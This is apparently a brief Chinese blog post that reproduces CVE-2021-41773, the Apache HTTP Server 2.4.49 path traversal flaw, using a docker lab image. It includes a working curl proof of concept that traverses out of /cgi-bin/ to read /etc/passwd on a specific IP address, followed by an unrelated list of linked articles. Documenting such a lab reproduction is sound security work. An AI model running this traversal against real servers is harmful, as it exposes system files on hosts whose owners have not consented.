影响版本
Apache HTTP Server 2.4.49
某些Apache HTTPd 2.4.50也存在此漏洞
环境搭建
docker pull blueteamsteve/cve-2021-41773:no-cgid
漏洞复现
1.使⽤poc
curl http://1.15.136.212:8080/cgi-bin/../../../../etc/passwd
相关推荐
Monody_R3 小时前
rhce作业CodeBlossom3 小时前
Apache POI数新网络13 小时前
The Life of a Read/Write Query for Apache Iceberg TablesAI分享猿15 小时前
雷池 WAF 免费版实测:企业用 Apache 搭环境,护住跨境电商平台Chief_fly16 小时前
RestTemplate 和 Apache HttpClient 实现 HTTP 请求浔川python社18 小时前
《Python 小程序编写系列》(第三部):简易文件批量重命名工具SelectDB18 小时前
替换 ClickHouse,查询并发提升 7 倍!高途教育基于阿里云 SelectDB 构建秒级实时报表梓沂1 天前
MyBatis的默认对象工厂org.apache.ibatis.reflection.factory.ObjectFactory武子康1 天前
大数据-150 Apache Druid 单机部署实战:架构速览、启动清单与故障速修SelectDB2 天前
Apache Doris 4.0.1 版本正式发布